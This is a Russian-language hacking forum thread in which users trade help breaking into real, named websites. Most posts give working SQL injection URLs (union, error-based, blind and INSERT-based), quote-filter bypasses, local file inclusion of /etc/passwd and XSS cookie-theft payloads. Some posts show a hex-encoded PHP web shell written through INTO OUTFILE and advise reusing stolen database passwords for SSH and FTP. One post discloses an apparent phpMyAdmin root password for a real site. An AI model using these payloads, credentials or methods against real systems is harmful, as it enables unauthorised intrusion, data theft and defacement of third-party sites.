так отоброжает скуль:

_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables

а так нет:

_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name= 0x%75%73%65%72%73

подскажите куда копать дальше.

winstrool said:
так отоброжает скуль:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables
а так нет:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name= 0x%75%73%65%72%73
подскажите куда копать дальше.


%75%73%65%72%73 wtf?

// Ты не в теме, это приватный zero day эксплойт

чОрт( я снова не в теме(

winstrool said:
так отоброжает скуль:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables
а так нет:
_http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name= 0x%75%73%65%72%73
подскажите куда копать дальше.



При чем тут URLENCODE? надо в hex.

Помогите вывести имена колонок.

http://www.pravo-advokat.ru/index.php?p_id=2+and+(select*from(select+count(*)f rom(select+1+union+select+2+union+select+3)x+group +by+concat(mid((select+column_name+from+INFORMATIO N_SCHEMA.columns+where+table_name=0x7573657273+lim it+0,1),1,64),floor(rand(0)*2)))z)+--+&m_id=4

вечер всем добрый ... нужно помощь в sql inj ... сразу скажу .. я новичок ... так что могу написать глупость ...

к делу ... есть иньекция в guestbook одного сайта (могу кинуть ссылку в пм) ...

при добавление ковычки к запросу получаю ошибку :

Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1111@1111.111','bbbbbbbbbbb',null, CURRENT_TIMESTAMP)' at line 1

Как я понимаю запрос выглядит примерно так :

INSERT INTO tables VALUES ('name','mail','mesege',null, CURRENT_TIMESTAMP)

подставляю' ) --

получаю ошибку

Ошибка: Column count doesn't match value count at row 1

тогда подставляю bvbvbvbb','ewewe@wewew.ru','ffffffffff',null, CURRENT_TIMESTAMP ) --

как я понимаю ... должно добавиться сообщение в гостевой книге но опятьже получаю ошибку

Ошибка: Column count doesn't match value count at row 1

Подскажите люди добрые ... как тут быть

P.s иньекцию делаю через форму name

При подстановке ' довольно часто сталкиваюсь вот с такой ошибкой


org.springframework.beans.TypeMismatchException: Failed to convert value of type [java.lang.String] to required type [java.lang.Integer]; nested exception is java.lang.NumberFormatException: For input string: "37752'" at org.springframework.beans.SimpleTypeConverter.conv ertIfNecessary(SimpleTypeConverter.java:50) at org.springframework.validation.DataBinder.convertI fNecessary(DataBinder.java:454) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.resolveRequestParam(HandlerMeth odInvoker.java:339) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.resolveHandlerArguments(Handler MethodInvoker.java:200) at org.springframework.web.bind.annotation.support.Ha ndlerMethodInvoker.invokeHandlerMethod(HandlerMeth odInvoker.java:130) at org.springframework.web.servlet.mvc.annotation.Ann otationMethodHandlerAdapter.invokeHandlerMethod(An notationMethodHandlerAdapter.java:310) at org.springframework.web.servlet.mvc.annotation.Ann otationMethodHandlerAdapter.handle(AnnotationMetho dHandlerAdapter.java:297) at org.springframework.web.servlet.DispatcherServlet. doDispatch(DispatcherServlet.java:875) at org.springframework.web.servlet.DispatcherServlet. doService(DispatcherServlet.java:809) at org.springframework.web.servlet.FrameworkServlet.p rocessRequest(FrameworkServlet.java:571) at org.springframework.web.servlet.FrameworkServlet.d oGet(FrameworkServlet.java:501) at javax.servlet.http.HttpServlet.service(HttpServlet .java:707) at javax.servlet.http.HttpServlet.service(HttpServlet .java:820) at org.mortbay.jetty.servlet.ServletHolder.handle(Ser vletHolder.java:487) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1093) at ims.app.filters.StatusReportingFilter.doFilter(Sta tusReportingFilter.java:19) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.mortbay.jetty.servlet.ServletHandler.handle(Se rvletHandler.java:360) at org.mortbay.jetty.security.SecurityHandler.handle( SecurityHandler.java:216) at org.mortbay.jetty.servlet.SessionHandler.handle(Se ssionHandler.java:181) at org.mortbay.jetty.handler.ContextHandler.handle(Co ntextHandler.java:726) at org.mortbay.jetty.webapp.WebAppContext.handle(WebA ppContext.java:405) at org.mortbay.jetty.servlet.Dispatcher.forward(Dispa tcher.java:285) at org.mortbay.jetty.servlet.Dispatcher.forward(Dispa tcher.java:126) at ims.app.session.wl.WhiteLabelUrlHelper.findWhiteLa belRedirect(WhiteLabelUrlHelper.java:78) at gb.app.servlet.Gateway.doFilter(Gateway.java:65) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.springframework.orm.hibernate3.support.OpenSes sionInViewFilter.doFilterInternal(OpenSessionInVie wFilter.java:198) at org.springframework.web.filter.OncePerRequestFilte r.doFilter(OncePerRequestFilter.java:76) at org.mortbay.jetty.servlet.ServletHandler$CachedCha in.doFilter(ServletHandler.java:1084) at org.mortbay.jetty.servlet.ServletHandler.handle(Se rvletHandler.java:360) at org.mortbay.jetty.security.SecurityHandler.handle( SecurityHandler.java:216) at org.mortbay.jetty.servlet.SessionHandler.handle(Se ssionHandler.java:181) at org.mortbay.jetty.handler.ContextHandler.handle(Co ntextHandler.java:726) at org.mortbay.jetty.webapp.WebAppContext.handle(WebA ppContext.java:405) at org.mortbay.jetty.handler.ContextHandlerCollection .handle(ContextHandlerCollection.java:196) at org.mortbay.jetty.handler.HandlerCollection.handle (HandlerCollection.java:114) at org.mortbay.jetty.handler.HandlerWrapper.handle(Ha ndlerWrapper.java:152) at org.mortbay.jetty.handler.StatisticsHandler.handle (StatisticsHandler.java:89) at org.mortbay.jetty.handler.HandlerWrapper.handle(Ha ndlerWrapper.java:152) at org.mortbay.jetty.Server.handle(Server.java:324) at org.mortbay.jetty.HttpConnection.handleRequest(Htt pConnection.java:505) at org.mortbay.jetty.HttpConnection$RequestHandler.he aderComplete(HttpConnection.java:829) at org.mortbay.jetty.HttpParser.parseNext(HttpParser. java:514) at org.mortbay.jetty.HttpParser.parseAvailable(HttpPa rser.java:211) at org.mortbay.jetty.HttpConnection.handle(HttpConnec tion.java:380) at org.mortbay.io.nio.SelectChannelEndPoint.run(Selec tChannelEndPoint.java:395) at org.mortbay.thread.BoundedThreadPool$PoolThread.ru n(BoundedThreadPool.java:450) Caused by: java.lang.NumberFormatException: For input string: "37752'" at java.lang.NumberFormatException.forInputString(Num berFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:458) at java.lang.Integer.valueOf(Integer.java:554) at org.springframework.util.NumberUtils.parseNumber(N umberUtils.java:146) at org.springframework.beans.propertyeditors.CustomNu mberEditor.setAsText(CustomNumberEditor.java:114) at org.springframework.beans.TypeConverterDelegate.do ConvertTextValue(TypeConverterDelegate.java:374) at org.springframework.beans.TypeConverterDelegate.do ConvertValue(TypeConverterDelegate.java:350) at org.springframework.beans.TypeConverterDelegate.co nvertIfNecessary(TypeConverterDelegate.java:173) at org.springframework.beans.TypeConverterDelegate.co nvertIfNecessary(TypeConverterDelegate.java:107) at org.springframework.beans.SimpleTypeConverter.conv ertIfNecessary(SimpleTypeConverter.java:47) ... 47 more


Так понимаю это ничего не дает или я не прав?

вечер всем добрый ... нужно помощь в sql inj ... сразу скажу .. я новичок ... так что могу написать глупость ...
к делу ... есть иньекция в guestbook одного сайта (могу кинуть ссылку в пм) ...
при добавление ковычки к запросу получаю ошибку :
Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1111@1111.111','bbbbbbbbbbb',null, CURRENT_TIMESTAMP)' at line 1
Как я понимаю запрос выглядит примерно так :
INSERT INTO tables VALUES ('name','mail','mesege',null, CURRENT_TIMESTAMP)
подставляю ' ) --
получаю ошибку
Ошибка: Column count doesn't match value count at row 1
тогда подставляю bvbvbvbb','ewewe@wewew.ru','ffffffffff',null, CURRENT_TIMESTAMP ) --
как я понимаю ... должно добавиться сообщение в гостевой книге но опятьже получаю ошибку
Ошибка: Column count doesn't match value count at row 1
Подскажите люди добрые ... как тут быть
P.s иньекцию делаю через форму name


Таблица tables содержит 5 колонок (количество полей в левой и правой части запроса должно совпадать)

Вписывая в поле ' )-- -

Запрос принимает вид


HTML:
INSERT INTO tables VALUES ('')-- -

MySQL выдаст ошибку: Column count doesn't match value count at row 1, так как количество полей не совпадает.

Как проводить инъекцию, зависит от того, что ты хочешь получить.

Ты можешь либо уравнять количество полей и вписать произвольные значения в базу в текущий запрос, отсеив остальное комментарием

bla','123123','122@mail.ru','ya mega hacker','777')-- -

Запрос примет вид


HTML:
INSERT INTO tables VALUES ('bla','123123','122@mail.ru','ya mega hacker','777')-- -

либо спровоцировать ошибку duplicate entry и выводить инфу через нее

bla','123123','122@mail.ru','ya mega hacker','777') on duplicate key update name = (select 1 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a)-- -

Запрос примет вид


HTML:
INSERT INTO tables VALUES ('bla','123123','122@mail.ru','ya mega hacker','777') on duplicate key update name = (select 1 from (select count(*), concat(version(), floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Вывод: Duplicate entry '5.0.91-community1' for key 1

Либо вытаскивать инфу основываясь на временных задержках

bla','123123','122@mail.ru','ya mega hacker',(if(ascii(mid((select table_name from information_schema.tables limit 0,1),1,1))>66,(sleep(10)),1)))-- -

Запрос примет вид


HTML:
INSERT INTO tables VALUES ('bla','123123','122@mail.ru','ya mega hacker',(if(ascii(mid((select table_name from information_schema.tables limit 0,1),1,1))>66,(sleep(10)),1)))-- -

И так далее

UPD: Не внимательно прочитал сообщение, тогда пали сюда линк.

Есть у кого словарь для брута колонок? Не могу никак в таблице Administrator подобрать колонки...

/thread148915-toolza.html вот тут хороший

Какая-то странная скуля, может кто сталкивался

+union+select+1--


Code:
Database access error:
SELECT `username`, `name`, `date` FROM `users` WHERE `ID`=9999999999 union select 1--

+union+select+1,2--


Code:
Database access error:
SELECT `picture` FROM `users` WHERE `ID`=9999999999 union select 1,2--

Не могу понять каким образом разные запросы вылазят.

1NtR0 said:
Какая-то странная скуля, может кто сталкивался
+union+select+1--

Code:
Database access error:
SELECT `username`, `name`, `date` FROM `users` WHERE `ID`=9999999999 union select 1--

+union+select+1,2--

Code:
Database access error:
SELECT `picture` FROM `users` WHERE `ID`=9999999999 union select 1,2--

Не могу понять каким образом разные запросы вылазят.


два запроса на странице, подставляя union select 1, первый становится верным, поэтому выдает ошибку со второго, в котором 3 поля, а подставив любое другое количество, ошибку выдаст первый запрос

крути через ошибку или вслепую

freezed said:
два запроса на странице, подставляя union select 1, первый становится верным, поэтому выдает ошибку со второго, в котором 3 поля, а подставив любое другое количество, ошибку выдаст первый запрос
крути через ошибку или вслепую


То, что там два запроса, это верно, но не нужно сразу советовать крутить как слепую.

Количество запросов на вывод не влияет, если вывод есть, то он будет.

1NtR0

http://forum.antichat.net/showpost.php?p=1047515&postcount=48

У тебя тоже самое, только вместо ошибки выводится сам запрос.

та спалите же сайт, сколько страниц будете пантамиму делать?

Seravin said:
/thread148915-toolza.html вот тут хороший


Не помог, может можно какие-то символы поставить перед всеми этими именами, по типу знака "_" ?

в тулзе есть такая возможность

omg_it_glowZ said:
Не помог, может можно какие-то символы поставить перед всеми этими именами, по типу знака "_" ?


Угадать префикс оооочень маленький процент.

Но если это популярная CMS, то есть специальные списки с популярными CMS'ками, где указано название CMS, список "интересных таблиц" (админы юзеры) и список колонок этих таблиц.

Ссылки не помню, но помню, что составлял данный список уважаемый ettee.

подскажите, - как можно обойти фильтрацию кавычки при SQL-INJ в mssql ? в том случае, если обычная кавычка ' заменяется на


PHP:
'

и кавычка " заменяется на


PHP:
"

очень нужно..

Подскажите пожалуйста,что это значит.

Есть сайт,я искал xss, и в поиск вписал ript>alert()ript>

в итоге на сайте появилась вот такая штука http://s012.radikal.ru/i321/1103/06/eb99dea6425b.jpg

а также поиск ответил


Поиск ript>
По запросу «ript> » ничего не найдено


что это может значить?

o'clock said:
Подскажите пожалуйста,что это значит.
Есть сайт,я искал xss, и в поиск вписал ript>alert()ript>
в итоге на сайте появилась вот такая штука
http://s012.radikal.ru/i321/1103/06/eb99dea6425b.jpg
а также поиск ответил
что это может значить?


Поздравляю, ты нашел пассивную XSS.

Не могу добиться вывода.

http://art.uga.edu/people.php?id=5025+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+--+

Лично для себя захотелось узнать, возможно ли провести sql'ку на

http://www.aratta-ukraine.com/sacred_ua.php?id=9999999

объясните плиз за +

Jer1cho said:
Существует ли другой способ залить шелл в phpbb3 не используя стили?


шаблоны

Какая здесь БД?

http://www.row2k.com/polls/index.cfm?cat=college&ID=-265+%6f%72%64%65%72+by+5+--+&type=USRowing%20Collegiate%20Poll

FlaktW said:
Какая здесь БД?
http://www.row2k.com/polls/index.cfm?cat=college&ID=-265+%6f%72%64%65%72+by+5+--+&type=USRowing%20Collegiate%20Poll



MSSQL

Jer1cho said:
Ну я это и имел ввиду, в шаблонах при правке выдается ошибка, специфичная для первых версий bb3, ждать пока админ обновит форум нет желания)), поэтому ищу другой способ.


залил кучу шеллов таким образом на пхпбб3, никогда не появлялась ошибка..либо ты что то неправильно делаешь (что мало вероятно, так как там нет ничего сложного), либо мне не попадались такие форумы, кидай в пм посмотрим что сделать можно..

есть один сайт, расположенный на сервере, знаю на каком , знаю где находится датацентр, владельца доменных имён, его емайлы,знаю ФИО, мобильник, и какие фирмы на нём)) знаю что админ не закрыл доступ с разных айпи к серваку через ssh, надо узнать root пароль.

просканил сервак на файлы имеющиеся на нём.

одни их них

robots.txt HTTP 200 OK

.htaccess 302 Found

.htconfig 302 Found

.htpasswd 302 Found

однако конечно же они закрыты) может быть могут быть полезными

некоторые папки открытые, некоторые закрытые.

поставил BT4 r2, с чего Начать?)))

сайт проверять на дыры бесполезно. написан достаточно хорошо.

OS-FreeBSD на серваке

kAtze said:
есть один сайт, расположенный на сервере, знаю на каком , знаю где находится датацентр, владельца доменных имён, его емайлы,знаю ФИО, мобильник, и какие фирмы на нём)) знаю что админ не закрыл доступ с разных айпи к серваку через ssh, надо узнать root пароль.
просканил сервак на файлы имеющиеся на нём.
одни их них
robots.txt HTTP 200 OK
.htaccess 302 Found
.htconfig 302 Found
.htpasswd 302 Found
однако конечно же они закрыты) может быть могут быть полезными
некоторые папки открытые, некоторые закрытые.
поставил BT4 r2, с чего Начать?)))
сайт проверять на дыры бесполезно. написан достаточно хорошо.
OS-FreeBSD на серваке


ну рут пароль к сайту вряд ли относится каким то боком...в папке сайта ты 99,99% не найдешь ничего что может тебе дать рута на серванте..ищи баги, заливай шелл..узнавай версию ядра..юзай сплоит..получай рута..

Не могу обойти фильтрацию.

http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11+--+

FlaktW said:
Не могу обойти фильтрацию.
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11+--+


Там двойной запрос:

http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11--+


Code:
SELECT * FROM root where p_id=-46 union select 1,2,3,4,5,6,7,8,9,10,11-- order by rank

http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10--+


Code:
SELECT * FROM `place` WHERE id=-46 union select 1,2,3,4,5,6,7,8,9,10-- order by up_date


Либо крути, как слепую с выводом в ошибку, либо: /showpost.php?p=1047515&postcount=48

Tigger said:
либо: /showpost.php?p=1047515&postcount=48


Так как написано в этой статье вывести, не получается.

Сейчас попробую вывести через ошибку.

FlaktW said:
Так как написано в этой статье вывести, не получается.
Сейчас попробую вывести через ошибку.


Через ошибку в данной скули вывести не получится... Т.к. тут при неверном запросе просто показывает SQL запрос, который пошел в базу. А саму ошибку не показывает.

пацаны это инклюд?

Fatal error: require() [function.require]: Failed opening required 'articles/../../../../../../../../../etc/php.ini/text.htm' (include_path='.:/usr/local/share/pear') in /pub/home/teplotex/htdocs/fedorov/warlib/index.php on line 115

Tazk2 said:
пацаны это инклюд?
Fatal error: require() [function.require]: Failed opening required 'articles/../../../../../../../../../etc/php.ini/text.htm' (include_path='.:/usr/local/share/pear') in /pub/home/teplotex/htdocs/fedorov/warlib/index.php on line 115


Да, попробуй так ../../../../../../../../../../../../../etc/passwd%00

,...


Взято с HackZone.RU - Больше про XSS

[QUOTE="boortyhuhtyu"]
boortyhuhtyu said:

Не могу разобратся. Значит запрос к базе такой

$dbb=mysql_query("select * from zas where id='{$_GET['id']}'");

$dbb=mysql_fetch_array($dbb);

получаетса id это int, и при запросе

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,2,3/*'

выводитса 2...

но если делаю запрос

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,user(),3/*'

то выдает Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in Z:\home\test1.ru\www\index.php on line ...

как правильно сделать?

asql said:
Не могу разобратся. Значит запрос к базе такой
как правильно сделать?


попробуй

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,unhex(hex(user())),3/*'

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,/*!user()*/,3/*'

Загружаю шелл в профайл админа cms Phorum, оказывается записывает файл в бд, как сделать исполнение кода? (http://127.0.0.1/file.php?0,file=1,filename=shell.php)

попробуй
http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,unhex(hex(user())),3/*'


помогло...

Возможно ли вскрыть такое?)

http://www.luman.lg.ua/content.php?type=about_0400'

asql said:
помогло...
Возможно ли вскрыть такое?)
http://www.luman.lg.ua/content.php?type=about_0400'


http://www.luman.lg.ua/strelby.php?title=%CF%F3%EB%E8+%22%CB%FE%EC%E0%ED% 22+FT-0%2C68&id=70+and+1=0+union+select+1,2,3,4,5,6,7,8,pass+fr om+adm_user

пробелы необходимо убрать

Подкиньте уязвимостей по phpbb 3.0.2...

Из тех что есть в этой темке (https://antichat.live/threads/24488/) большинство подразумевает наличие уязвимых модов либо права админа... У меня нет возможности даже зарегистрироваться(регист� �ация там только по подтверждению админом), а из модов, насколько я понял, только некие arcade и tosviolation.

Не думал, что когда-то буду сюда писать...но))

_http://www.nordiz.ru/tovar.php?tovar_id=2395

Тут только посимвольно можно вытаскивать?)

Kernet said:
Не думал, что когда-то буду сюда писать...но))
_http://www.nordiz.ru/tovar.php?tovar_id=2395
Тут только посимвольно можно вытаскивать?)


ВНЕЗАПНО!111

http://www.nordiz.ru/news.php?newsid=119+union+select+1,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15--+

Kernet said:
Не думал, что когда-то буду сюда писать...но))
_http://www.nordiz.ru/tovar.php?tovar_id=2395
Тут только посимвольно можно вытаскивать?)


да ,

database version: 5.1.41-log

database user: hand_mysql@10.1.104.162

database name: hand_nordis

мда, скульмап по 1 символу в 1.5 минуты тащит, олоооо

какая по умолчанию таблица vbulletin где храняться пользователи? и название колонок если можно

noviyuser said:
какая по умолчанию таблица vbulletin где храняться пользователи? и название колонок если можно


Вот, полезный списочек http://itdefence.ru/dbitems/


Code:
Table: user
Columns:
userid
usergroupid
username
password
email

как можно определить жумлу к какому сайта относится кроме таблиц jos_session и jos_content и файла configuration.php (на самом деле только доступ к таблицам)?

Помогите, плз

Имею пхп-инъек..

Вытащил config.php - получил данные к mysql, но host:localhost

Вопрос: как можно узнать mysql.server???

спасибо​

stasiliy said:
Помогите, плз
Имею
пхп-инъек
..
Вытащил
config.php
- получил данные к mysql, но
host:localhost
Вопрос: как можно узнать
mysql.server
???
спасибо​


попробуй в качестве хоста указать домен этого сайта, если не прокатит, то удалённое подключение запрещено, придётся заливать шелл, либо ещё что..

baobabeng said:
попробуй в качестве хоста указать домен этого сайта, если не прокатит, то удалённое подключение запрещено, придётся заливать шелл, либо ещё что..


пробовал, не выходит

А в /etc/passwd можно откопать имя пользователя???

stasiliy said:
пробовал, не выходит
А в /etc/passwd можно откопать имя пользователя???


данный файл носит больше информационную нагрузку..имена пользователей системы ты там найдешь...но это тебе не поможет...попробуй подключится к базе айпи_адресс_сервера:3306 (но скорее всего не получится, как тебе уже говорили), посмотри на 2ип.ру какие еще сайты есть на серванте, попробуй у соседей почитать конфиги..может где и есть бейсик авторизация в админку..

Проблема с фильтрацией двойных ковычек в ксс...

В общем проблема:


...
value="alert(document.cookie)">


И так:


...
value="
>
alert(document.cookie)">


Так-то оно вроде все нормально, но мне нужно выйти за приделы value, если подставить двойную кавычку, она фильтруется через htmlspecialchars()...

Пробовал и так:


data:text/html;base64,Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2 tpZSk8L3NjcmlwdD4=


Но пока безуспешно... Подскажите что-нибудь.

Есть скул на jboard3


Code:
export.php?t=php&n=5&c=0&r=40%20UNION%20SELECT%201,2,3,4,concat%28table_sch ema,0x2e,TABLE_NAME%29%20FROM%20INFORMATION_SCHEMA .TABLES%23

Помогите выудить логин и пасс админа, структура таблиц вот:


Code:
`jb_admin`
--

CREATE TABLE `jb_admin` (
`login` varchar(32) NOT NULL,
`password` varchar(32) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

stasiliy said:
Помогите, плз
Имею
пхп-инъек
..
Вытащил
config.php
- получил данные к mysql, но
host:localhost
Вопрос: как можно узнать
mysql.server
???
спасибо​


Как тебе уже сказали, подключиться удаленно к БД получится вряд ли. Ну тут есть пару вариантов:

1) попробовать вытащенный пасс из конфига к админке с юзером: admin, adm, administrator и с юзером, который был вытащен из конфига.

2) попробовать подключиться к FTP. пасс: из конфига. юзер: "админовские", из конфига который, из /etc/passwd

3) попробовать найти на домене phpMyAdmin и с данным пассом подключиться к ней. Юзеров опять же пробовать "админовских", из конфига который, из /etc/passwd

4) попробовать подключиться к SSH. Пароль из конфига. Юзеры: "админовские", root, из конфига, из /etc/passwd.

P.S.: Если в /etc/passwd дохера юзеров (т.е. имя системного пользователя для каждого аккаунта на хостинге), то нет смысла пробовать пробить все! Тебе из /etc/passwd нужно имя пользователя-владельца, где ты нашел инклюд.

bluesky На античате куча статей по SQL-иньекциям, советую почитать

Запрос тебе нужен такой:

export.php?t=php&n=5&c=0&r=40+UNION+SELECT+1,2,3,4,concat(login,0x3a,passwo rd)+FROM+jb_admin--+

Moriarty, ты не поставил комменатрий, без которого запрос может не обрезать и SQL-запрос вызовет ошибку. Ну и '::' нет смысла) А вдруг mq? Который обычно включен всегда. Правильнее захексить: 0x3a3a.

Требуется помощь в заливке шелла через phpMyAdmin

5.1.41-3ubuntu12.10:root@localhost:debian-linux-gnu

file_priv=Y

MQ=on

ты не нуждаешся в помощи, только нужно найти путь к папке где есть права на заливку, что еще надо?

Konqi said:
ты не нуждаешся в помощи, только нужно найти путь к папке где есть права на заливку, что еще надо?


Перебрал более 30 папок, но такой не нашел.

Сейчас пытаюсь залить через URL двойным запросом, но пока не очень получается.

Не получается.

Кто возмется залить, скину линк в ПМ.

FlaktW said:
Перебрал более 30 папок, но такой не нашел.
Сейчас пытаюсь залить через URL двойным запросом, но пока не очень получается.


а если не нашел тогда чем поможет тебе двойной запрос?

все равно прав не будет, тама скани директории сайта,реверсни IP, мб найдеш инклуд в соседних сайтах

Konqi said:
а если не нашел тогда чем поможет тебе двойной запрос?
все равно прав не будет, тама скани директории сайта,реверсни IP, мб найдеш инклуд в соседних сайтах



там два сайта. один на php, второй на asp.

Делаю запрос:

select 0x3c3f73797374656d28245f4745545b636d645d293f3e into outfile '/var/www/tmp/shell.php'

Выдает

Can't create/write to file '/var/www/ju/tmp/gen.php' (Errcode: 2)

file_priv=Y

FlaktW said:
Делаю запрос:
select 0x3c3f73797374656d28245f4745545b636d645d293f3e into outfile '/var/www/tmp/shell.php'
Выдает
Can't create/write to file '/var/www/ju/tmp/gen.php' (Errcode: 2)
file_priv=Y


Прав не хватает?

KATYA said:
Прав не хватает?


Папка tmp доступна для записи всегда.

FlaktW said:
Делаю запрос:
select 0x3c3f73797374656d28245f4745545b636d645d293f3e into outfile '/var/www/tmp/shell.php'
Выдает
Can't create/write to file '/var/www/ju/tmp/gen.php' (Errcode: 2)
file_priv=Y


с чего ты взял что там есть данная папка? вот по адресу /tmp/ она всегда есть.. a в /var/www/ она может называтся как угодно temp, temporary..bla bla а может и не быть там

Gorev said:
с чего ты взял что там есть данная папка? вот по адресу /tmp/ она всегда есть.. a в /var/www/ она может называтся как угодно temp, temporary..bla bla а может и не быть там


Попробуй сам залить шелл.

http://www.japanupdate.com/phpmyadmin/

root:b3777@p@du7@

japanupdate:x:33:33::/var/www/ju/htdocs

удали..в приват надо было..ща все туда попрут

+order+by+18446744073709551616+-- выводит без ошибки

+order+by+18446744073709551615+-- выводит с ошибкой

значит 18446744073709551616 столбцов? такое возможно?

A_n_d_r_e_i said:
+order+by+18446744073709551616+-- выводит без ошибки
+order+by+18446744073709551615+-- выводит с ошибкой
значит 18446744073709551616 столбцов? такое возможно?


это хэксированная штука, т.е. скажем 18446744073709551616=version() или что-то другое, хотя такое не встречал, может там блайнд идет.

в какой таблице IPB можно узнать адрес сайта (напободие wp_options в wordpress)? поиск по мылу не увенчался успехом.

noviyuser said:
в какой таблице IPB можно узнать адрес сайта (напободие wp_options в wordpress)? поиск по мылу не увенчался успехом.


я ищу по названию тем в форуме...

Привет.

Если не трудно, помогите, пожалуйста, раскрутить.

http://www.orlyba[...:::G00GLE:::...]or.co.il/catin.asp?productid=163%27&catid=31&Contact_02=No

http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

идет фильтрация кавычек...

как можно обойти?

заранее спс

и вот еще интересная

http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*

как залить шелл если имеется доступ только к pma? права root

foozzi said:
как залить шелл если имеется доступ только к pma? права root


/thread133925-phpmyadmin+shell.html

asql said:
http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
идет фильтрация кавычек...
как можно обойти?
заранее спс


а кавычки тут и не нужны, параметр-то числовой

почему не работает юнион:

http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true


asql said:
и вот еще интересная
http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*


помимо гета есть еще и пост

почему не работает юнион:
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true


не катит, выдает

Can't execute query SELECT * FROM families WHERE CatID=32 and substring(version(),1,1)=3 true AND date_archived IS NULL ORDER BY orderval

Error: You have an error in your SQL syntax near 'true AND date_archived IS NULL ORDER BY orderval' at line 1

может я что то не так делаю... хз..

Moriarty said:

freezed said:
почему не работает юнион:


Может потому, что его не было в 3 ветке?! =\


" if author else f"

Moriarty said:

freezed said:
почему не работает юнион:


Может потому, что его не было в 3 ветке?! =\


а где ты там вопрос увидел?

Moriarty said:
Не загоняй! true к запросу не относится! Это означает что мускул 3ей ветки!
Может потому, что его не было в 3 ветке?! =\


ввожу

http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3

выдает норм страницу...

Вы строго не судите меня, я новичок в этом святом деле=)

и если можно , то прошу объяснить принцып действия тут вот этого


substring(version(),1,1)=3


именно подбор полей как происходит? типа этого?


substring(1)=1
substring(1,2)=2
substring(1,2,3)=3


или дайте линк...

asql said:
ввожу
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3
выдает норм страницу...
Вы строго не судите меня, я новичок в этом святом деле=)
и если можно , то прошу объяснить принцып действия тут вот этого
именно подбор полей как происходит? типа этого?
или дайте линк...


/thread18552-blind+sql.html - вот это

https://rdot.org/forum/showthread.php?t=245 - потом это

https://rdot.org/forum/showthread.php?t=503 - и напоследок

согласно 3 ссылке и описанному там методу MySQL 3 error based inj, раскручивать её можно через вывод в ошибке, т.е (лишние пробелы, вставляемые форумом, убрать)


Code:
http://www.hawkingtech.com/products/index.php?CatID=32+or+1+group+by+concat(version(), floor(rand(0)*2))+having+min(0)+or+1+--+

Интересует полноценный шелл на Macromedia ColdFusion.

FlaktW said:
Интересует полноценный шелл на Macromedia ColdFusion.


/thread239916.html

Konqi said:
/thread239916.html


Как называется phpMyAdmin для CFM?

Заранее спасибо.

Gorev said:
только скажи зачем тебе админка...скуль есть там..Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in*/home/u201549/sch114.ru/www/user.php , судя по этому..скажу сразу..сайт на мастерхосте..даже если получится залить шелл...что мало вероятно..то прав там немного будет...и ноекзек на серванте однозначно..но не это важно..важно зачем тебе сайт школы?


Уверн, он просто хочет сломать сайт школы и написать "Галина Сергеевна- дура!!!", т.к. сам учится в этой школе и хочет обосрать математичку/информатичку/директора.

http://sch114.ru/events/18+union+select+1--/


Кстати тоже хотельсьбы узнать (ради опыта) как можно провернуть инъекцию...

пробовал

+union+select+N--

/**/union/**/select/**/N/*

/**//*!union*//**//*!select*//**/N-- так вообще ноль

FlaktW said:
Как называется phpMyAdmin для CFM?
Заранее спасибо.


Cold fusion это интерпретируемый язык, а пхп админские панели для управления субд пишутся изходя из различия именно СУБД а не ЯП, так есть phpMyAdmin (для mysql), phpPgAdmin (для постгрес), phpMSAdmin (для MS SQL) и тп

